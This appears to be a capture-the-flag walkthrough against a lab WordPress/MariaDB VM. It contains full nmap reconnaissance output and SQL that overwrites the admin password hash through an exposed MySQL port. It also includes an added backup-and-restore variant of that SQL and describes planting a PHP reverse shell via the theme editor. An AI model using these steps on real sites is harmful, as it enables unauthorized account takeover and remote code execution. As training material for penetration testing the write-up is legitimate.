```
sudo nmap --min-rate 10000 -p- 192.168.162.147
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:24 CST
Nmap scan report for 192.168.162.147
Host is up (0.00046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:2C:C9:48 (VMware)
```
```
sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.162.147
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:25 CST
Nmap scan report for 192.168.162.147
Host is up (0.00046s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Did not follow redirect to http://sunset-midnight/
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 16
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsTransactions, Speaks41ProtocolOld, IgnoreSigpipes, Speaks41ProtocolNew, Support41Auth, ODBCClient, SupportsCompression, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: q>#3vy{#6$SU12HSHN2M
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:2C:C9:48 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
```
sudo nmap --script=vuln -p22,80,3306 192.168.162.147
[sudo] password for mikannse:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 11:25 CST
Nmap scan report for 192.168.162.147
Host is up (0.00038s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /blog/: Blog
|   /wp-login.php: Possible admin folder
|   /wp-json: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2
|   /feed/: Wordpress version: 5.4.2
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|   /contact/: Potentially interesting folder
|_  /home/: Potentially interesting folder
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:2C:C9:48 (VMware)
```
Because MySQL is reachable on 3306, the admin password hash can be overwritten directly in wp_users instead of guessing it:

```sql
-- e10adc3949ba59abbe56e057f20f883e is md5("123456"). WordPress still accepts a
-- bare MD5 in wp_users.user_pass for backward compatibility and rehashes it
-- with phpass the next time the user logs in.
UPDATE wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" WHERE ID=1;
```
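The same reset done the way it should be done on an engagement, as an added example that is not part of the original walkthrough: confirm which row is actually the admin account, save the original hash before destroying it, and restore it afterwards. It assumes the default wp_ table prefix that the walkthrough's own query uses; the backup table name wp_users_bak is an invented name.

```sql
-- Added example, not from the original page. Assumes the wp_ table prefix;
-- wp_users_bak is a made-up scratch table name.

-- 0. Don't assume ID 1 is the account you want. nmap enumerated the login
--    name "admin"; check it against the table before touching anything.
SELECT ID, user_login, user_email FROM wp_users;

-- 1. Save the original hash. It is a phpass hash ($P$...), which cannot be
--    recovered once overwritten, and the site owner will want it back.
CREATE TABLE wp_users_bak AS
  SELECT ID, user_login, user_pass FROM wp_users WHERE user_login = 'admin';

-- 2. Reset the password. md5("123456") = e10adc3949ba59abbe56e057f20f883e.
--    WordPress accepts a bare MD5 here and rewrites the row with a fresh
--    phpass hash on the first successful login.
UPDATE wp_users
   SET user_pass = 'e10adc3949ba59abbe56e057f20f883e'
 WHERE user_login = 'admin';

-- 3. Verify exactly one row changed and it is the one you expected.
SELECT ID, user_login, user_pass FROM wp_users WHERE user_login = 'admin';

-- 4. While in the database: siteurl/home explain the redirect to
--    http://sunset-midnight/ that nmap reported, and therefore the hostname
--    WordPress will use for its own loopback requests later on.
SELECT option_name, option_value
  FROM wp_options
 WHERE option_name IN ('siteurl', 'home');

-- 5. Clean-up after the engagement: put the original hash back (note that
--    a login in between will have replaced the MD5 with a new phpass hash,
--    so the backup, not "what is there now", is the value to restore).
UPDATE wp_users u
  JOIN wp_users_bak b ON b.ID = u.ID
   SET u.user_pass = b.user_pass;
DROP TABLE wp_users_bak;
```

Using the login name rather than ID=1 in the WHERE clause also protects against installs where the first account was renamed or deleted; if step 0 shows a different ID for admin, the original one-liner would have reset the wrong user.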
Getshell
The login succeeds, and the rest is the usual routine: replace the active theme's index.php with a PHP reverse shell through Appearance > Theme Editor. Saving the file fails, though, with this error:

Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

Since WordPress 5.2 the theme and plugin editors make a loopback HTTP request to the site's own URL to check that the edited file does not fatally error before the change is kept; if that request fails for any reason the edit is rolled back. The most likely cause here is the redirect to http://sunset-midnight/ seen in the nmap output: the server cannot resolve that name for itself, so the loopback never succeeds. Adding sunset-midnight to the attacking host's /etc/hosts makes the site browsable from our side but does nothing for the server-side check.